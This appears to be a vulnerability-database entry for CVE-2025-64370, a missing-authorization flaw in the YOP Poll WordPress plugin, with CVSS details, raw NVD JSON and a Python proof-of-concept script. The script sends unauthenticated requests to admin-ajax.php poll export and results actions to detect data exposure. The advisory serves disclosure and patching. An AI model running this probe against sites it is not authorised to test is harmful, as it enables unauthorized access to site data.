Security Vulnerability Report
中文
CVE-2025-64370 CVSS 5.3 MEDIUM

CVE-2025-64370

Published: 2025-11-13 10:15:54
Last Modified: 2026-04-27 16:16:42

Description

Missing Authorization vulnerability in YOP YOP Poll yop-poll allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects YOP Poll: from n/a through <= 6.5.38.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

YOP Poll <= 6.5.38

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64370 PoC - YOP Poll Missing Authorization # Description: Unauthenticated access to privileged poll management functions import requests import sys TARGET_URL = "http://target-site.com/wp-admin/admin-ajax.php" def check_vulnerability(): """ Check if YOP Poll plugin is vulnerable to CVE-2025-64370 Tests for missing authorization on admin-ajax.php endpoints """ # Test endpoints that should require authentication test_endpoints = [ { "action": "yop_poll_export_results", "params": {"poll_id": 1} }, { "action": "yop_poll_get_poll", "params": {"poll_id": 1} }, { "action": "yop_poll_get_results", "params": {"poll_id": 1} } ] print("[*] Testing YOP Poll plugin for CVE-2025-64370") print(f"[*] Target: {TARGET_URL}\n") for endpoint in test_endpoints: try: # Send unauthenticated request response = requests.post( TARGET_URL, data={ "action": endpoint["action"], **endpoint["params"] }, timeout=10 ) # Check if response indicates successful unauthorized access if response.status_code == 200: # Check for data exposure in response if "success" in response.text or "data" in response.text: print(f"[+] VULNERABLE: {endpoint['action']} - Unauthorized access possible") print(f" Response preview: {response.text[:200]}...") else: print(f"[-] Protected: {endpoint['action']}") else: print(f"[-] Protected: {endpoint['action']} (Status: {response.status_code})") except requests.RequestException as e: print(f"[!] Error testing {endpoint['action']}: {e}") print("\n[*] Scan complete. If vulnerabilities found, update YOP Poll to latest version.") if __name__ == "__main__": check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64370", "sourceIdentifier": "[email protected]", "published": "2025-11-13T10:15:53.567", "lastModified": "2026-04-27T16:16:41.610", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in YOP YOP Poll yop-poll allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects YOP Poll: from n/a through <= 6.5.38."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/yop-poll/vulnerability/wordpress-yop-poll-plugin-6-5-38-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}